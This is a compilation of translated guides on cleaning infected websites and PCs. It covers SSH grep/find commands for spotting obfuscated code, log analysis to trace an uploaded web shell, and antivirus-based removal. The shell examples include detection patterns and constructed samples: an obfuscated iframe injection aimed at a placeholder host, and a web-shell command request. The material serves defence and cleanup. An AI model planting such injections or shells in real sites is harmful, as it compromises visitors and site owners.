What to do if infected: what to do if a virus does get onto your device, and what to do if the methods above did not clean up your computer

Every webmaster has faced the problem of vulnerabilities in their website: weaknesses through which an attacker can upload malicious code that in one way or another degrades the whole site, up to its removal from search results.

Most often, infection happens because of human error. But what do you do once the site has been hacked?

Main problems

Finding and removing the malicious code itself is the lesser evil. The real problem is finding the weak spot through which the attacker uploaded the code, so that you can protect yourself from a repeat.

Many anti-virus programs have been written and many services created to search for malicious code; they can point to the address of an infected page and even provide a signature and comprehensive information about the malware itself. But no software can tell you how this “alien code” got onto the site. Here you can rely only on yourself.

Below are several commands that can be used when searching for infected files and for shells/backdoors uploaded to your website. You will need SSH access to the server and an SSH client (PuTTY on Windows; ssh on Linux and macOS).

Search for infected files

The following commands find files containing “dangerous” constructs that an attacker can use to execute obfuscated malicious code.

Output goes to a log file in your current directory. Each log line contains the path of the matching file and the first line in it with a suspicious fragment (grep -H prints the file name, -i ignores case, -m1 stops at the first match in each file). Expect false positives: "eval" also matches words such as "evaluate", and "base64" appears in legitimate code, so read the hits rather than deleting on sight. Replace /path/to/site with the directory that holds the site and quote it if it contains spaces.

find /path/to/site -type f -exec grep -Him1 "eval" {} \; > ./eval.log
find /path/to/site -type f -exec grep -Him1 "base64" {} \; > ./base64.log
find /path/to/site -type f -exec grep -Him1 "file_get_contents" {} \; > ./file_get_contents.log

Finding directories with full write permissions

The following command lists directories that are writable by everyone. These are the directories an attacker uses to drop files onto a website. -perm -o+w matches any world-writable directory (777 as well as 757, 1777 and similar); an exact -perm 777 would miss the others.

find /path/to/site -type d -perm -o+w

Search for changed files over a period

If you know roughly when the infection happened, you can list the files changed over the last few days. -mtime -7 matches files whose contents were modified less than 7 days ago. Since an attacker can reset the modification time with touch, repeat the search with -ctime -7, which matches files whose metadata changed; the change time is set by the kernel and cannot be backdated from user space.

find /path/to/site -type f -mtime -7

What to do if the site is infected?

So, suppose we have found infected files or a shell. Before you delete it or strip the malicious code from it, note its full path, its modification and creation dates, and its owner user and group (uid/gid on Unix systems): this is what lets you work out how it got onto the site. Start with the user and group.

See which user your web server runs as (on nginx/php-fpm setups look for those process names instead of apache2):

ps aux | grep "[a]pache2" | awk '{print $1}' | sort -u


If this is the same user that owns the malicious file, the file was most likely written by the site itself, that is, through a vulnerability in one of its scripts. If the owner is different, the file was probably uploaded via FTP (in that case change the passwords for the FTP server and the site’s administrative panel immediately). Note that on hosts where PHP runs under the account owner (suPHP, per-user PHP-FPM pools), ownership cannot tell the two cases apart; the logs below can.

grep "filenameOfShellScript" ./site.ru.access.log


This gives every request to our script. From it we get the attacker's IP address and User-Agent.

The next command lists every request that client made:

grep "ip" ./site.ru.access.log | grep "userAgent"


Analyze it carefully and you will find the vulnerable spot on the site. Pay particular attention to the POST requests in the output, since that is how a malicious file is usually uploaded, and especially to the requests made just before the first access to the shell.
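As an added example (not the article's own code), the same steps run over a constructed access log in the common combined format. The shell name img.php, the client addresses (taken from the documentation ranges) and the User-Agent strings are invented for the demonstration; the process names in webserver_user extend the article's apache2 with httpd, nginx and php-fpm.

```shell
#!/bin/sh
# Added example: attribute an uploaded shell to the requests that planted it.
# The access log written by make_sample_log is constructed for the demo.

# User(s) the web server and PHP run as. The [a] trick keeps the awk process
# itself out of the match.
webserver_user() {
    ps aux | awk '/[a]pache2|[h]ttpd|[n]ginx|[p]hp-fpm/ { print $1 }' | sort -u
}

# Owner of a file (column 3 of ls -l), portable across GNU and BSD userland.
file_owner() {
    ls -ld "$1" | awk '{ print $3 }'
}

# Every request for the uploaded file. NAME is matched literally (-F).
shell_hits() {
    grep -F "$2" "$1"
}

# Distinct "ip<TAB>user-agent" pairs that requested the file. Splitting on the
# double quote gives: $1 = 'ip - - [date] ', $2 = request line, $6 = User-Agent.
shell_clients() {
    shell_hits "$1" "$2" | awk -F'"' '{ split($1, a, " "); print a[1] "\t" $6 }' | sort -u
}

# All requests from one client (ip + UA), in log order. The requests made
# before the first hit on the shell show how it got there.
client_requests() {
    awk -v ip="$2" -v ua="$3" -F'"' '{ split($1, a, " ") } a[1] == ip && $6 == ua' "$1"
}

# Only the POST requests from that client: the usual upload/exploit vector.
client_posts() {
    client_requests "$1" "$2" "$3" | awk -F'"' '$2 ~ /^POST /'
}

# Constructed combined-format log: one legitimate visitor and one attacker who
# probes an upload script, POSTs to it, then uses the planted img.php.
make_sample_log() {
    log=$(mktemp)
    cat > "$log" <<'EOF'
203.0.113.7 - - [10/Feb/2015:11:02:13 +0300] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0"
198.51.100.23 - - [10/Feb/2015:11:05:41 +0300] "GET /admin/upload.php HTTP/1.1" 200 812 "-" "python-requests/2.5.1"
198.51.100.23 - - [10/Feb/2015:11:05:43 +0300] "POST /admin/upload.php HTTP/1.1" 200 61 "-" "python-requests/2.5.1"
198.51.100.23 - - [10/Feb/2015:11:05:45 +0300] "GET /uploads/img.php?cmd=id HTTP/1.1" 200 188 "-" "python-requests/2.5.1"
203.0.113.7 - - [10/Feb/2015:11:06:02 +0300] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0"
198.51.100.23 - - [10/Feb/2015:11:08:10 +0300] "POST /uploads/img.php HTTP/1.1" 200 2210 "-" "python-requests/2.5.1"
EOF
    echo "$log"
}
```

With the sample log, shell_clients returns a single pair (198.51.100.23, python-requests/2.5.1); client_requests for that pair gives four lines, and the first of the two POSTs, to /admin/upload.php two seconds before img.php is first requested, is the upload that planted the shell. Matching on ip and User-Agent together, as the article does, filters out other visitors who may have hit the shell later; a careful attacker can change both, so also look for other clients whose first request is to the shell.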

Andrey Izhakovsky, system administrator

First aid

If you find that the site is infected or you receive a notification that there is malware on your account:

Why are there viruses on my website?

Common causes of site infection are:

  • vulnerability in the CMS version used;
  • vulnerability in the installed CMS extension (themes, plugins, modules);
  • viruses on the computer from which the site is managed.

Most often, attackers hack websites automatically using special programs. They collect a large database of sites from search engines by certain criteria (sites running popular CMSs and plugins with a known vulnerability) and then place malicious code in the site files. That is why it is important to update the CMS and plugins promptly. On the hosting side, client accounts are isolated from one another: if another client's site on the same server is infected, yours is not affected by it.

How can I protect the site?

To protect your site from hacking, you should follow simple rules:

  • Set correct permissions on the site's directories and files. Avoid "777" permissions: they give every user on the server full access to your files and directories. Use "777" only in exceptional cases.
  • Monitor updates to the CMS you use and its plugins on official websites and install them in a timely manner.
  • Use only official CMS themes and plugins. Very often, hacked (nulled) versions of paid scripts contain viruses.
  • Use complex passwords (at least 8 characters, with digits and both upper- and lower-case letters; longer is better). Simple passwords are very easy to guess.
  • Use anti-virus software and regularly update anti-virus databases.
  • Use only current versions of browsers (Mozilla Firefox, Google Chrome, Opera, Safari).
  • Do not store passwords in FTP clients: malware very often harvests the saved credentials from an FTP client.

What do you do if, on opening the site, your antivirus suddenly raises an alert (and clients report the same)? Or the site, for no apparent reason, takes longer than usual to load even though the main page content is already rendered? Or the interactive scripts the site used suddenly stop working?

All of the above are symptoms of a site infected with a virus, that is, with foreign malicious code. How did it happen, who is to blame and, most importantly, what do you do to remove it and prevent it from happening again?

What's happened?

The malicious code that the antivirus flags is an insertion of obfuscated JavaScript into the page code which, when executed, creates an iframe (an HTML element that embeds the content of one page in another). The inserted iframe usually points to an infected page containing “heavier” code that exploits browser vulnerabilities (mainly in Internet Explorer at the time) to download and run an executable.

Mechanism of infection

The infection mechanism is the same in the vast majority of cases: malware gets onto the computer from which you log into the site over FTP and reads the saved credentials for every address for which the “remember login/password” option was selected in the FTP client. It sends those credentials to the attackers’ servers, where bots do the “dirty” work: they connect to the FTP addresses with the stolen credentials, scan the site directories for files with specific names (most often entry-point files, those requested first when a visitor opens the site), download each such file, append malicious code to the end of it and upload it back, replacing the original.

From the server's point of view this looks like normal user activity: a connection by an authorized user, followed by downloading and uploading files, which is exactly what a developer does when updating the site via FTP.

Removing the infection

The first thing to do when such an infection is detected is to stop it from re-infecting the site. Change the FTP password through the control panel, and check every computer from which you have connected to the site via FTP with an antivirus using the latest databases.

Since site code is essentially ordinary text files, to remove the malicious code you open the infected file, find the inserted fragment, delete it and save the file. In particularly bad cases several different viruses have “worked” on the site, and its files contain several insertions of different malicious code. Less often the content of a site is damaged so badly that restoring from a backup is preferable to cleaning each file by hand.
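As an added example (not from the original article), a small shell script that finds pages carrying the kind of appended injection described above, keeps a copy of each infected file as evidence, removes the injected line and checks that nothing remains. The pages, the iframe target example.invalid and the payload itself are constructed for the demonstration. The script assumes the injection sits on its own line, as an appended payload usually does; anything woven into an existing line still needs manual editing or a restore from a clean backup.

```shell
#!/bin/sh
# Added example: strip an appended iframe/JavaScript injection from site files,
# keeping a ".infected" copy of each original. Sample pages are constructed.

# Match the technique rather than one URL: an iframe built from an escaped
# string via document.write(unescape(...)), or an iframe hidden with CSS.
INJECT_RE='document\.write\(unescape\(|<iframe[^>]*visibility: *hidden'

# Files under DIR that contain the injection. Only the file types the bots
# rewrite (pages, templates, scripts); -l prints each file once.
find_injected() {
    find "$1" -type f \( -name '*.html' -o -name '*.htm' -o -name '*.php' -o -name '*.js' \) \
        -exec grep -lIE "$INJECT_RE" {} + 2>/dev/null
}

# Copy FILE to FILE.infected (mode and timestamps preserved), rewrite FILE
# without the matching lines and print how many lines were removed.
clean_file() {
    f=$1
    cp -p "$f" "$f.infected" || return 1
    grep -vE "$INJECT_RE" "$f.infected" > "$f"
    echo $(( $(wc -l < "$f.infected") - $(wc -l < "$f") ))
}

# Clean every infected file under DIR and print the total number of removed lines.
clean_dir() {
    find_injected "$1" | while IFS= read -r f; do
        clean_file "$f"
    done | awk '{ s += $1 } END { print s + 0 }'
}

# Succeeds only if no file under DIR still matches the injection.
verify_clean() {
    [ -z "$(find_injected "$1")" ]
}

# Constructed sample site: a page with the appended payload, a clean page and
# a template with a hidden iframe on its own line.
make_sample_site() {
    site=$(mktemp -d)
    cat > "$site/index.html" <<'EOF'
<html><head><title>Home</title></head>
<body><p>Welcome</p></body>
</html>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fexample.invalid%2Fin.php%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E'))</script>
EOF
    cat > "$site/about.html" <<'EOF'
<html><body><p>About us</p></body></html>
EOF
    cat > "$site/footer.php" <<'EOF'
<?php echo "footer"; ?>
<iframe src="http://example.invalid/in.php" style="visibility: hidden; position: absolute"></iframe>
EOF
    echo "$site"
}
```

Run find_injected first and read the list before cleaning; then clean_dir, verify_clean, and only after the FTP password has been changed and the workstations checked (the step above) put the site back online, otherwise the bots will simply re-append the payload. The .infected copies keep the original modification times, which is useful when correlating with FTP logs.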

Preventing Infection

To avoid repeating others' mistakes and protect your site from damage, follow these simple recommendations:

    do not use the password saving capabilities of FTP clients;

    periodically change FTP access passwords;

    if necessary, limit the addresses of computers from which you are allowed to connect via FTP;

    use only “reliable” computers for FTP access - those on which antiviruses with current update databases are installed.

16.02.2015 16:05:23

There is always a chance that your computer will be infected by malware, even if you have an antivirus installed. And when no security software is installed on the computer, this probability is even higher.

If infection occurs, it is best to contact specialists for “treatment.” However, there is not always a computer expert nearby. In this article, you can learn how to recognize the infection yourself and fix the problem - or, if possible, reduce the risk of harm before a specialist arrives.

Signs of infection

If you suspect a virus

Since modern viruses are built to work over a network, if you suspect an infection it is essential to unplug the network cable or, on a wireless network, to switch off the Wi-Fi adapter.

Unfortunately, there are situations when the network is needed for the “treatment”, for example to download an antivirus program. It is better to download the anti-virus utility on another computer and copy it to the infected, disconnected one, for example on a flash drive. If that is not possible, you can use the Internet, but under no circumstances log into online banking, mailboxes and the like: do not expose confidential data in any way. As soon as all the necessary anti-virus tools have been downloaded, disconnect the network again.

It should be understood that the very fact that a computer is infected, that is, the presence of an active virus in the operating memory, can make “treatment” difficult. The virus can resist: for example, block access to the websites of antivirus manufacturers or camouflage itself from specific antivirus programs. This means that in some cases “treatment” with the help of an additional “clean” system may be necessary. For example, you can boot the system from a CD, or you can remove the hard drive with the infected system and connect it as a second one to a known “clean” computer.

How to cure a computer

There are different ways to get rid of malware, each with its own advantages and disadvantages.

Method 1. Using ready-made antivirus tools

The vast majority of users will be satisfied with “cleaning” their computer using ready-made tools that are offered by antivirus software developers. In particular, you can easily find free utilities designed specifically for “curing” an infected computer. Here are some examples of such programs with a Russian-language interface:

  • Dr.Web CureIt! (http://www.freedrweb.com/cureit/);
  • Kaspersky Virus Removal Tool (http://www.kaspersky.ru/antivirus-removal-tool);
  • Microsoft Safety Scanner (http://www.microsoft.com/security/scanner/ru-ru/default.aspx).

Of course, you can use other utilities, but download them only from the official developer sites, preferably on a “healthy” computer, and then transfer them to the infected one.

Despite the comparative simplicity of this method, before embarking on “treatment”, you need to understand a number of principles:

  1. Even if your computer is protected by antivirus software, it can still be infected by a virus the antivirus does not recognize.
  2. If the antivirus does not recognize this particular virus at this particular moment, it is quite possible that it will begin to recognize it in the future, for example, if you update the databases with virus signatures.
  3. If the installed antivirus does not recognize this particular virus, it is quite possible that an antivirus from another manufacturer will recognize it.
  4. If none of the antiviruses finds viruses on your computer, this does not mean that they are not there. However, we have no choice but to assume with a high degree of probability that the computer is “clean”.

In other words, it is possible that you will need to carry out treatment using several utilities from different manufacturers.

The general treatment regimen is as follows:

  1. If your computer is infected with a blocker, you must first unblock it (see the article on Trojan blockers).
  2. Install and run the treatment utility.
  3. Follow the instructions.
  4. After completing the utility, install and run one or more utilities from other manufacturers in the same way.
  5. The computer has been disinfected. Now you need to install (or reinstall) the antivirus complex.
  6. The computer is disinfected and protected. Change all passwords for Internet services, email programs, instant messengers and so on. If you use online banking, watch card and account activity closely: on any suspicious transaction, contact the bank to agree on the necessary measures (cancelling payments, reissuing cards, etc.).
  7. If you were unable to cure your computer on your own for some reason, you need to contact a specialist. Don't forget about the availability of technical support for antivirus users: this can save you a lot of time, nerves and money.

Method 2: Reinstalling the operating system

This is a radical method, to be used when antivirus tools do not help. Before reinstalling the OS it is advisable to format the hard drive, which is not always convenient: it destroys not only the malware but also useful data. Installing and especially configuring the OS is also laborious.

The task of reinstalling the system can be made easier if you take care of this in advance. For example, the “My Documents” folder in Windows can be moved to another logical or physical drive, which will allow you to format the system partition at any time without fear of losing personal data. In addition, owners of the latest versions of Windows have the opportunity to create an OS installation disk that also stores its own set of programs and settings.

You should also keep in mind that if your computer is infected with a ransomware virus, simply reinstalling the system will not help you recover encrypted personal data.

Method 3: Manually detect and remove malware

It should be said right away that this method is recommended last. Even a deep knowledge of the operating system is unlikely to help you implement it adequately: there is a high probability that you will either miss some malicious modules, or, on the contrary, mistake a useful program for a virus and delete something you need, violating the integrity of the OS.

Even general recommendations, such as checking the startup folder and the Windows registry startup keys, will not help much: without professional knowledge and experience in IT security it is very difficult to distinguish “bad” files from “good” ones.

In the age of technology we deal not only with the convenience of gadgets but also with their problems, and the same is true of the computer. A PC is a very complex system and, unfortunately, is susceptible to various kinds of cyber attack. How can you tell whether your computer is infected with a virus or an adware worm?

Harm

What is the question really about? If you decide that your computer is infected, it is important to understand what exactly you are dealing with.

A computer virus is malicious software that can replicate itself, inject itself into other code and system areas, destroy boot sectors and spread to other systems over the network.

The primary goal of a virus is to spread; deleting, hiding or adding files and so on are side effects.

Sometimes such a file was not even written to do deliberate harm, yet because of incompatibilities or subtleties of interaction the system fails anyway.

Viruses can “live” on drives and consume all resources from there.

Evolution

To understand how to determine that a computer is infected, you need to understand the types of viruses and their interaction on the system.

Unfortunately, as technology has developed, malware has improved along with it: viruses have penetrated entire government systems protected by special measures. Even such defenses cannot withstand some “villains”.

Groups

Malicious software differs by distribution methods and functionality. Previously, it was possible to pick them up only through storage media such as floppy disks. Now most of them come to our PC via the Internet.

There is no standardized classification of viruses because they sometimes have ambiguous characteristics. Therefore, it is not easy to assign them to any group.

Some programs attack particular areas of the system: files, boot services, source code, scripts and so on.

There is also a classification by infection mechanism: “pests” that attach themselves to an executable file, those that corrupt a document beyond recovery, and viruses that “live” on their own, constantly acting on the system.

Some malware uses stealth techniques inside the system, so even determining that the computer is infected becomes difficult.

Experts also divide viruses by the language they were written in. There is also software that abuses additional system functions: it can spy, collect information, record user actions and so on.

Warning

You can avoid ever seeing the notification that your computer is infected. What does that take?

Of course, popular antivirus programs have long been the main assistants. But recent malware has become so advanced that security programs cannot handle everything. So follow some recommendations so that you do not catch a virus and then wonder how to tell that your computer is infected.

Avoid working under privileged accounts unless necessary, meaning a Windows administrator-type account. If malware runs with administrator rights, you can say goodbye to your data and to the system as a whole.

Remember that launching suspicious, little-known programs from unverified sources also leads to infection. Be wary if the system starts changing its own files.

Also disable potentially dangerous system features you do not use. It is better not to wander onto unknown resources, and to look closely at the address bar. Use trusted distributions.

If you often work with important data, keep it on an external drive or make backup copies. You can also take an image of the whole system that can be redeployed.

The system is in danger

Many people wonder how to tell whether their computer is infected. The answer is simple: the signs below will tell you something is wrong with the system.

The alarm bells are:

  • Unexpected messages or images appear on the screen.
  • Regular playback of sounds, which can occur chaotically at any time.
  • Self-activation of programs.
  • Connecting some utilities to the Internet without your knowledge.
  • Sending incomprehensible messages (spam) from your email address to your friends.
  • The system freezes or runs slowly.
  • A huge number of system errors and notifications.
  • Inability to boot the system.
  • Disappearance of personal data: files, folders and archives.
  • The browser is not working correctly.

Of course, these are not all the signs that can occur during infection. There are a lot of variations: from large pornographic banners to completely shutting down the PC.

First actions

What do you do if your computer is infected with a virus? If you can tell that a “worm” has settled in the system, take the following steps immediately.

Immediately stop using online banking and electronic wallets, and do not log into any important accounts or financial systems.

If you have no antivirus on the PC, use at least an online version to scan the system quickly and find out what “surprises” are hiding there.

It is best to disconnect from the Internet and the local network, so that the virus cannot “call” for help or “hide” on the network for a while. If the antivirus finds malware, it decides what to do with it: remove it immediately or move it to quarantine.

Often one security program cannot cope and you will have to install another, which is itself not entirely safe. So make sure an antivirus is installed in advance. If it interferes with your work you can turn it off, but it is the antivirus that knows how to tell that your computer is infected.

If none of the options help, you should take decisive action.

Additional Help

If you do not understand computers at all, call a specialist to “treat” the PC. If you have at least a superficial knowledge of the system, you can try to find the virus file yourself; attempt this only for an ordinary worm or Trojan.

If you understand that you have a complex malicious program that is not so easy to remove from the system yourself, you can try using third-party programs. In some cases, you will need to connect the hard drive to another PC or boot the system from a disk.

Conclusions

Viruses are a nuisance that has probably happened to every user. Attackers all over the world are trying to steal personal data or simply play a trick on an inexperienced user.

If you are facing a simple malicious file, an antivirus program will most likely find it and cure or remove it on its own.

If it is a Trojan or a worm, you can deal with it yourself by finding it among the system files or in the root directory; use any file manager that can sort files by date.

If there is a real “villain” in the system, only real specialists can deal with it: they will not only remove it from the PC but also save your personal data. If your documents are not important or there is nothing on the computer, you can simply reinstall the operating system.